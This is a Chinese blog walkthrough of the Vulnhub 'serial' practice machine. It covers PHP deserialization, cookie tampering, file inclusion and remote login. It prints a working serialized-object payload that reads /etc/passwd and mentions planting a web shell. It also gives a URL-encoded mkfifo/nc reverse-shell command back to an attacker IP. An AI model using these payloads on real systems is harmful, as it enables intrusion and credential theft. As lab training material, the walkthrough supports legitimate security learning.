php反序列化靶机serial实战

已于 2024-08-01 20:24:17 修改
阅读量104 收藏 2
点赞数 5
文章标签: php 开发语言
于 2024-08-01 19:38:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_69065643/article/details/140854430
版权

扫描ip,找到靶机ip后进入

他说这是cookie的测试网页,我们抓个包,得到cookie值

base64解码

扫描一下靶机ip的目录

发现http://192.168.88.153/backup/,访问

下载一下发现是他的网页源码

通过代码审计,发现

通过代码审计得知,首先index.php文件包含了user.class.php文件,对cookie中的user参数进行了序列化和base64编码,然后user.class.php文件包含了log.class.php,且定义了两个类,分别是Welcome和User,并调用了log.class.php文件中的handler函数。log.class.php文件又定义了Log类和成员变量type_log,且handler函数对变量还进行了文件包含和输出。

构造payload

<?php
  class Log {
    private $type_log = "/etc/passwd";
  }

  class User {
    private $name = "admin";
    private $wel;

    function __construct() {
      $this->wel = new Log();
  }
}
$obj = new User();
echo base64_encode(serialize($obj));
?>

获取到base64编码后的字节序列

抓包,将编码后的数据抓包后替换

放包

查看到passwd

写一个1.txt,内容为

修改palyload为

访问99.php

在攻击模块中替换,并查询ip

成功执行

开始反弹shell

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.0.102+4444+>/tmp/f

上述代码是特定url编码后的填入参数位置,在kali里开启监听

在攻击模块发送

成功获取shell

查看文件,多返回几次上级目录,找到一个txt文件

查看文件  得到sk4账号密码

远程连接

养只小羊7
关注
  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[网络安全自学篇] 八十二.WHUCTF之隐写和逆向类解题思路WP(文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析)
杨秀璋的专栏
06-04 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Easy_unserialize解题思路,详细分享文件上传漏洞、冰蝎蚁剑用法、反序列化phar等。这篇文章将详细讲解WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
php 靶机,php反序列化靶机serial实战
weixin_39552037的博客
03-10 362
靶机描述今天研究一下php反序列化靶机serial实战。目标为获取root权限。靶机信息可以去vulhub上下载此靶机:https://www.vulnhub.com/entry/serial-1,349/下载好,之后,使用Vmware新建虚拟机打开,步骤如下:1.首先创建新的虚拟机。 2.然后选择客户机版本为Ubuntu 64位。 3.然后选择使用现有磁盘,选择下载的vmdk磁盘文件即可。 ...
vulhub-serial-php反序列化靶机实战
飞鱼的企鹅的博客
01-04 1898
前言 此漏洞环境是vulhub上的系列漏洞之一,是php反序列化漏洞,也用到了远程代码执行漏洞。 复现过程 环境搭建 靶机下载地址 https://www.vulnhub.com/entry/serial-1,349/ 下载好之后直接用Vmware workstation打开就行了 存活扫描 内网存活主机扫描 arp-scan -l 扫描到的存活主机是192.168.77.157 端口扫描 ...
反序列化靶机实战serial(保姆级教程)
2201_75891821的博客
08-01 811
反序列靶机教程 详细
反序列化靶机serial实战
m0_63944205的博客
08-01 216
页面只有一行文本:Hello sk4This is a beta test for new cookie handler,提示这里是新cookie进行程序测试,那我们查看cookie。这里我们没有看到任何可控的参数,也没有可输入的内容,我们也不清楚目录结构,那么我们可以尝试去扫描目录。我们拿到加密后的字符序列去进行抓包,并将字符序列替换到如图。我们发现命令成功,然后我们修改py.php代码为。我们发现一个压缩包,将他下载下来看看。解码后发现是一串字符序列。得到一串加密后的字符序列。放到www文件夹下访问。
反序列化靶机serial复现
最新发布
muyuchen110的博客
08-01 554
【代码】反序列化靶机serial复现。
vulnhub靶场serial-php渗透
问彡心的博客
07-31 1361
整个渗透过程中主要漏洞在于反序列化的利用配合远程文件包含,将wel的对象替换,由于恰好Log对象中存在handler函数且有文件包含,才能进行利用,我把这招称之为"偷梁换柱",还是很形象的,当执行一句话木马时,离成功也就不远了,随之从反弹终端中得到的账户密码进行远程登陆,在执行命令过程中通过提示发现了sudo下的vim是可以直接执行的,在vim命令行中有!command暂时离开vim到指令列模式下执行command的显示结果,利用此功能成功借用了bash来执行输入的命令httpshttps。...
[Vulnhub] serial-php反序列化漏洞
weixin_45605352的博客
05-05 776
0x01 环境搭建 漏洞环境:https://www.vulnhub.com/entry/serial-1,349/ 下载后使用Vmware打开 创建新的虚拟机: 选择客户机版本为Ubuntu 64位: 一直下一步,知道选择使用现有磁盘: 选择下载的vmdk磁盘文件: 开机,环境配置完成: 0x02 漏洞复现 探测主机存活及端口 用nmap探测主机存活,探测到存活主机192.168.1.111,开放了22端口和80端口: nmap -PS -T4 192.168.1.0/
反序列化漏洞靶机实战-serial
C233333235的博客
08-01 1144
下载地址为,安装好后开启靶机,这里并不需要我们去登录,直接扫描虚拟机nat模式下c网段的ip,看看哪个的80端口开放,然后直接去访问。
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
Apache Log4j反序列化命令执行漏洞
01-10
vulhub靶机里的这个漏洞里缺少了curl或者wget这些命令
靶机happycorp实战练习
09-08
学习
靶机操作练习,earth 靶机实战练习
09-08
在网络安全和渗透测试的学习过程中,靶机操作是一个重要的实践环节。在这个案例中,我们通过一个名为"earth"的靶机进行了一系列的操作,旨在提升信息收集、Web应用分析、权限提升和漏洞利用等技能。 首先,我们进行...
53、PHP 实现归并排序
weixin_44010641的博客
07-30 291
【代码】53、PHP 实现归并排序。
WordPress原创插件:搜索引擎抓取首图seo图片
爱酷码的博客
07-29 486
WordPress原创插件:搜索引擎抓取首图seo图片。
PHP框架详解 - symfony框架
丁爸的博客
07-28 1022
Symphony框架是一个功能强大、稳定可靠、易于扩展和定制的开源Web框架,适用于构建各种类型的Web应用程序。虽然在某些情况下可能会遇到一些性能和学习曲线的挑战,但是通过合理的配置和优化,以及积极的学习和实践,可以充分发挥Symphony框架的优势,构建高质量的Web应用程序。Symphony框架是一个基于PHP的开源Web框架,它提供了一套丰富的组件和工具,可以帮助开发者更轻松地构建高质量的Web应用程序。
PHP一维数组怎么转关联数组
qq_32450471的博客
07-30 301
php是一门广泛应用于web开发的脚本语言。其强大的数组功能是其最重要的特征之一。在PHP中,数组是一个能够存储多个值的变量,并且这些值可以是任何类型的数据,比如整数、浮点数、字符串、布尔值、对象等等。此外,数组还可以分为索引数组和关联数组。本文主要介绍PHP中一维数组转关联数组的方法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值